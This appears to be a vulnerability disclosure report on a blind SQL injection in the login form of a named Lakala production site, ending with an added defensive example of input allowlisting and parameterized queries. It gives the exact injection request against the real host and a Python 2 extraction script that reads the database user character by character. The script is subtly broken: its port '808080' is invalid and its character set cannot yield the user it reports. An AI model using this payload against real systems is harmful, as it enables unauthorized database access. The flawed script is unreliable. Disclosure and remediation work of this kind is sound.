MySQL injection exists at a Lakala site (with verification script)
A MySQL injection (boolean-based blind, with verification script) exists in a Lakala website.
Injection point:
POST http://jzlq.lakala.com:7070/pos/index.php?action=login
Body: captcha_keystring=1&password_login=&password_login_show=&username=aa"XOR(if(length(user())=15,1,0))OR"bb
The username parameter is injectable (boolean-based blind): the condition is true when the page displays "Enter new password".
Extracting user() confirms the injection and yields:
auto1@localhost
Python script:
```python
# Encoding = utf-8
# Python 2 verification script from the report (httplib, print statement).
import httplib
import time
import string
import sys
import random
import urllib

headers = {'content-type': 'application/x-www-form-urlencoded'}
# Character set tried at each position (as given in the report)
payloads = list('signature @_. ')
print 'start to retrive MySQL User: \n'
user = ''
for i in range(1, 16):
    for payload in payloads:
        print '.',
        conn = httplib.HTTPConnection('jzlq.lakala.com:808080', timeout=3)
        # Boolean condition: is the i-th character of user() equal to payload?
        s = 'aa"XOR(if(ascii(mid(user() from (%s) for (1)))=%s,1,0))OR"bb' % (i, ord(payload))
        conn.request(method='POST', url='/pos/index.php?action=login',
                     body='captcha_keystring=&password_login=&password_login_show=&username=' + urllib.quote(s),
                     headers=headers)
        html_doc = conn.getresponse().read().decode('utf-8')
        conn.close()
        # The "enter new password" page indicates the condition was true
        if html_doc.find(u'enter new password') > 0:
            user += payload
            sys.stdout.write('\r[In Progress]' + user)
            sys.stdout.flush()
            break
print '\n[Done] MySQL user is %s' % user
```
Solution:
Validate and filter the username parameter.
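To make the fix concrete, here is an added example (not code from the report or from the site) contrasting the vulnerable pattern with a filtered, parameterized lookup. It uses an in-memory SQLite table as a stand-in for the site's user store, an assumed allowlist for usernames, and the report's own injected username as test input; SQLite rejects the rewritten query outright, whereas MySQL would evaluate it, which is exactly the difference the blind injection relies on.

```python
import re
import sqlite3

# Allowlist for usernames (an assumption for this example): letters, digits,
# dot, underscore and hyphen, 1 to 32 characters. Quotes, parentheses and
# spaces, which the injected value needs, are rejected outright.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")

# The injected username from the report, used here only as test input.
PAYLOAD = 'aa"XOR(if(length(user())=15,1,0))OR"bb'


def is_valid_username(username):
    """Return True only if the username matches the allowlist."""
    return bool(USERNAME_RE.match(username))


def build_demo_db():
    """Constructed in-memory stand-in for the site's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users (username) VALUES (?)",
                     [("aa",), ("auto1",)])
    return conn


def find_user_unsafe(conn, username):
    """The vulnerable pattern: the value is pasted into the SQL text inside
    MySQL-style double quotes, so a quote in the username rewrites the query.
    Returns the matching ids, or None when the database rejects the query
    (SQLite fails to parse the injected text; MySQL would evaluate it)."""
    sql = 'SELECT id FROM users WHERE username = "%s"' % username
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error:
        return None


def find_user_safe(conn, username):
    """The fix: reject out-of-allowlist input, then bind the value as a
    parameter so the driver never lets it alter the statement."""
    if not is_valid_username(username):
        return []
    rows = conn.execute("SELECT id FROM users WHERE username = ?", (username,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = build_demo_db()
    print("unsafe:", find_user_unsafe(db, PAYLOAD))  # None: query was rewritten
    print("safe:", find_user_safe(db, PAYLOAD))      # []: handled as plain data
```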